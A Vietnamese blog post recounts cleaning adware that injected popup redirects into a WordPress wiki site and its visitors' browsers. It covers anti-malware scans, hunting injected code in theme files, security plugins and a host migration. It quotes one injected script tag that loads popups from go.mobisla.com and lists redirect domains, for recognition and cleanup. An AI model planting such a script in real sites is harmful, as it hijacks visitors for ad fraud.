(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Update 18/11/2018. Bài dài nhưng sau 1 thời gian mày mò và test thì bạn chỉ cần đọc phần update ngày 18/11/2018 là giải quyết được vấn đề
Bài viết này là kinh nghiệm bản thân sau khi làm theo 1 số cách trên mạng, đã áp dụng thành công vào web DragonBallwiki.net, nay chia sẻ để các bạn tham khảo. Loại trojan này có rất nhiều biến thể khác nhau nên tùy từng trường hợp cụ thể mới làm chính xác được, bài viết này sẽ giúp được phần nào.
Tổng quan
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Trojan quảng cáo là 1 loạt các loại adware, malware...có chức năng xâm nhập vào máy tính, vào trình duyệt, vào mã nguồn để thực hiện nhiệm vụ khi khách truy cập nhảy ra các popup vô tội vạ (quảng cáo). Lưu ý rằng đây ko phải là Virus nguy hiểm kiểu ăn file hay làm hỏng win hay gì cả, nó chỉ là lợi dụng trình duyệt, web của mình để nhảy lên các quảng cáo và nguồn thu thì về nó. Mình ngoài việc bị lợi dụng còn rất khó chịu khi các cửa sổ cứ nhảy lên -> làm giảm uy tín web, mất traffic
Hoàn cảnh
DragonBallWiki.net thời gian vừa rồi gặp tình trạng là khi ấn vào các bài viết, hoặc ấn vào khoảng trắng web thì nó nhảy ra các popup quảng cáo từ trang web deloton.com rồi chuyển hướng thành đủ các trang landing khác nhau, và vấn đề là nó chả liên quan gì đến nội dung web và cũng ko phải vấn đề mà khách quan tâm (ko thông minh như quảng cáo google)
Ngoài ra khi ấn vào link web trên Google tìm kiếm, trên facebook share cũng nhảy ra 1 trang quảng cáo.
Cơ chế lây lan và phân biệt Trojan
Sử dụng công cụ quét trực tuyến
Khi bị nhiễm trojan, nó thường sẽ chuyển hướng sang các trang web "trung gian" như: go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.com], deloton. com, go.oclasrv.com, bigpicturepop.com, thepopularlinks.com, codeonclick.com, Onclickads.net
Sau đó sẽ dẫn đến 1 trang landing quảng cáo 1 cái gì đó không liên quan. Mình ko đủ chuyên môn để hiểu sâu cơ chế lây lan nhưng thường là máy tính bị dẫn đến nhiễm vào các file bạn dow về, sau đó up ngược lên host mà ko scan thì dẫn đến web bị. Ngoài ra khi cài nhầm virus vào máy, nó cũng sẽ ngầm cài vào trình duyệt, dẫn đến trình duyệt bị. Còn thâm nhập vào mã nguồn web là do các lỗ hổng trong mã nguồn, theme, plugin mà ko bản quyền, download lậu các bản null, crack trên mạng.
Một cái nữa là cần phân biệt trojan ở máy tính, ở trình duyệt và ở web là các vị trí khác nhau. Bạn cần phân biệt khi web của bạn bị popup là do trình duyệt hay do bản thân web?Có nhiều cách để kiếm tra:
- Dùng công cụ Scan web như: https://sitecheck.sucuri.net/ hay Virustatal hay https://www.quttera.com/
- Cài phần mềm Malwareby giới thiệu phía dưới, khi truy cập vào web nào có trojan nó sẽ chặn và cảnh báo
- Gửi web cho bạn bè ấn nếu bị tức là do web, còn ko tức là do trình duyệt ở máy của bạn
GIẢI PHÁP
1) Quét máy tính bằng tool tự động
Các bạn download lần lượt và chạy cả 3 phần mềm có cùng chức năng dưới đây. Mặc dù bài hướng dẫn nói "nếu ko hết thì chạy tiếp phần mềm thứ 2" nhưng mình thấy là thừa còn hơn thiếu cứ chạy hết, bọn nó sẽ bù trừ cho nhau. Thực tế mình chạy phần mềm 1 có rất nhiều trojan, quét hết xong đến phần mềm 2 thấy còn 1/3 , sang đến phần mềm 3 thấy còn 2 con :v. Với mỗi lần chạy và fix thì khởi động lại máy.
Đương nhiên Trojan nó không cài thẳng vào máy như kiểu các phần mềm khác (ổ C:/program), bạn sẽ không thể tìm nó trong mục remove phần mềm, thậm chí là các Tool gỡ phần mềm chuyên dụng. Nó sẽ cài vào bất kì vị trí nào khác trong máy.
Sau khi cài xong, bật phần mềm lên ấn Scan Now
chờ 1 lúc nó sẽ scan các trojan có trong máy
Nó hiện ra các trojan có trong máy, ấn Quarantine Selected để xóa hết rồi khởi dộng lại máy. Sang cài phần mềm thứ 2
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Cài xong mở phần mềm lên ấn Scan
Nó quét xong ấn Next để tiến hành xóa trojan khỏi máy. Xong thì khởi động lại, cài phần mềm thứ 3
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Cài xong mở phần mềm lên ấn Scan now
Quét xong ấn Clean & Repair
ấn Clean and restart là xong
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
2) Sửa trình duyệt web
Thật ra khi dùng các tool trên thấy cũng quét đc kha khá rồi vì đôi khi trojan nằm trong máy nó điều khiển các trình duyệt popup ra
Nếu có thời gian và tỉ mẩn, bạn tham khảo thêm cách fix các trình duyệt bằng tay ở bài hướng dẫn này:
https://www.2-spyware.com/remove-deloton-com-virus.html#google-chrome
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
3) Fix ở website
Đây là phần quan trọng nhất
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Ở trên có cài phần mềm Malwareby, khi bạn vào web có trojan nó sẽ cảnh báo. Ví dụ khi mình vào dragonballwikil.net thì nó báo có trojan go.oclasrv.com
->Mình Ctrl U để xem mã nguồn ở home thì thấy có đoạn code như này được thêm vào:
<script data-cfasync=”false” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=1698432&interactive=1&pushup=1″ async=”async”></script>
Về web thì cũng cần có 1 chút kiến thức cơ bản về mã nguồn nhé, biết được các file nằm ở đâu và cách để edit nó
Cơ chế: lợi dụng lỗ hổng mã nguồn thì nó sẽ thêm 1 đoạn code vào các file hiển thị, công việc của ta là tìm các file này và xóa các mã lạ đó đi. Nhưng nhiều khi xóa xong 1 thời gian lại thấy nó hiện lại -> đã có 1 file khác nó là "chủ", khi file kia bị xóa thì nó lại tạo lại -> cần tìm file chủ này và xóa đi.
Ví dụ:
- 1 số file hiển thị: index.php , header.php, single.php
- 1 số file “chủ” (trong thư mục theme): functions.php,
- 1 số file khác ở thư mục wp-include: wp-vcd.php , class.wp.php , post.php, wp-tmp.php,
Vậy bạn cần vào các file này, mở nó lên và tìm đến các đoạn code lạ và xóa đi. Có thể tìm kiếm bằng tên các trang web nêu trên sẽ ra đoạn code lạ đó, ví dụ: go.oclasrv.com, go.mobisla.com, deloton.com....
Chú ý: Đây chỉ là liệt kê 1 số file điển hình, chứ tùy trường hợp trojan nó lây vào file nào thì chịu
Cách nhanh hơn: Nếu vấn đề chỉ nằm ở mã nguồn và theme,plugin thì cách đơn giản nhất là:
- Download mã nguồn mới về up đè lên cái cũ
- Mua theme, plugin bản quyền về up đè lên cái cũ, hoặc chí ít cũng dow lại theme, plugin từ các nguồn có uy tín (ko bản quyền thì nguy cơ vẫn rất cao)
Kết quả: sau khi mình xóa code lạ ở file funtion.php ở theme cùng việc up lại mã nguồn thì thấy web đã hết.
Trojan nhiễm vào cơ sở dữ liệu (database?)
(Cách diệt trojan quảng cáo website-cách diệt trojan quảng cáo trình duyệt,diệt trojan deloton.com,diệt trojan go.oclasrv.com)
Ca này nặng mình chịu, thậm chí còn chả biết là database của mình có nhiễm ko. Tuy nhiên đến đây rồi thì cũng giới thiệu 1 số plugin tối ưu hóa database, nên cài và dùng thử tất cả vì mỗi cái lại có điểm mạnh riêng:
- Advanced Database Cleaner : Cái này có khá nhiều tùy chọn tối ưu database nhưng mà bản có phí thì mới cho phép chọn riêng các database dư thừa để xóa
- WP-Optimize: Plugin này lâu đời và có uy tín, chức năng miễn phí của nó cũng khá hiệu quả rồi
Viết bài này cảm thấy tâm trạng thực sự tốt vì đã tự fix được trojan của wiki. Chứ lúc đầu hỏi mấy nhà chuyên môn báo giá toàn vài triệu/domain nản quá 🙁
Update 25/08/2018
Tất cả các việc trên đến lúc này khẳng định là nó chỉ diệt được Malware ở máy tính và trình duyệt thôi (nên dùng cái MalwareBy), còn website thì hoàn toàn vô dụng. Vào trực tiếp web thì ko sao, nhưng share link lên facebook rồi ấn vào nó vẫn chuyển hưởng đến các trang quảng cáo linh tinh (ảnh).
Tuy nhiên đến lúc này đã có cách
Bước 1: Scan toàn bộ web tìm ra file lạ
Cài đặt Plugin Anti-Malware Security and Brute-Force Firewall
Sau đó vào setting plugin và ấn Run complete scan, nó sẽ scan toàn bộ domain. Quá trình như này
Số lượng file nhiễm malware là màu đỏ, nó chỉ ra đường dẫn rất rõ ràng, bạn vào tận nơi xóa tay. Nếu ko muốn mất công thì mua bản Pro nó tự xóa cho
Tuy nhiên, làm như này chỉ vài ngày sau lại bị lại =))), vì căn bản web của bạn quá "yếu", nhiều lỗ hổng, ko có biện pháp phòng thủ. Vậy ta cần kết hợp bước 2.
Bước 2: Cài các plugin bảo mật
Phương án này do 1 a pro tư vấn mình, bạn cài đồng loạt 3 Plugin sau:
- iThemes Security Pro: Plugin bảo mật toàn diện
BBQ Pro:Ngăn chặn Queries xấu - Blackhole for Bad Bots: Tạo ra bẫy để ngăn chặn các Bot xấu
2 Plugin trên cần bản Pro, bạn có thể đầu tư hoặc mua rẻ trên chotheme.com . Cách thức cấu hình bạn có thể tham khảo trên google với các từ khóa như "hướng dẫn sử dụng Tên-plugin", cách cấu hình Tên-plugin"...
Đối với website mới thì 3 Plugin kia là cách "phòng bệnh" vô cùng hiệu quả. Điều quan trọng nhất là bạn phải cài theme và plugin sạch thì đảm bảo bảo mật >90%. Còn trường hợp web cũ đã bị dính thì bước 1 là "quét rác ra khỏi nhà" còn bước 2 là "đóng cửa" không cho nó vào lại nữa.
Đến thời điểm viết bài này thì Malware chưa trở lại, đây có thể coi là bài học nhớ đời với những đứa chuyên dùng hàng null, crack như mình.
Update 18/11/2018
Sau rất nhiều nỗ lực ở trên thì mình thấy…malware vẫn còn, cuối cùng kết luận là do host bị nhiễm. Vậy tóm lại các bước đơn giản bạn cần làm là:
Bước 1. Download riêng thư mục uploads về, cái này chứa các loại ảnh
Bước 2. Dùng các phần mềm diệt virus ở máy scan xem có virus ko. Khuyên nên dùng ESET Smart Security
Bước 3. Liệt kê trước đó các plugin và theme đang dùng và download lại bản mới ở wordpress.org, riêng các plugin hay theme ko có trên đó thì nhất định PHẢI MUA. Mấu chốt bị lây nhiễm là do dow các bản null, crack thôi. Có thể vào các hội nhóm mua giá rẻ của các Pro hoặc lên chotheme.com mua cũng khá ổn
Bước 4. Download file database .Sql ở web cũ về =>Cái bước này hên xui nhé, nếu virus nhiễm cả vào data thì mình chịu thôi
Bước 5. CỰC QUAN TRỌNG, ĐỔI HOST!. Tức là có thể vẫn nhà cung cấp đó, bạn bảo người ta tạo 1 gói host khác tương tự rồi chuyển hạn đóng tiền sang. Thời gian vừa rồi mình mày mò làm các kiểu cách vẫn ko được, bảo host thì nó auto đổ cho do mã nguồn chứ k bao giờ nhận do host nó đâu. Mình đổi host cái thì ok luôn
Bước 6. Ta đã có 1 bộ mã nguồn mới, plugin và theme sạch, host mới. Giờ ta upload tất cả lên host
Bước 7. Tạo database mới rồi import cái data ở host cũ về
Bước 8. Xong, vậy web bạn đã trở lại như chưa hề có cuộc chia ly. Tuy nhiên, hãy cài ngay plugin bảo mật MÀ BẠN MUA, ví dụ như Ithemes security
Bước 9. Ok ngồi chờ xem trojan có trở lại ko bằng cách truy cập web bt. thường thì sau 2-3 ngày nếu có sẽ trở lại ngay. Cách kiểm chứng khá đơn giản là bạn cứ chmod folder về 555, chmod file config về 444, nếu trở lại nó đổi thành 755 hết =))
Bước 10. Sau này thấy theme, plugin premium nào hay thì tuyệt đối ko tìm kiếm Null, crack. thế là được!
CHÚC CÁC BẠN THÀNH CÔNG!
Nguồn tham khảo: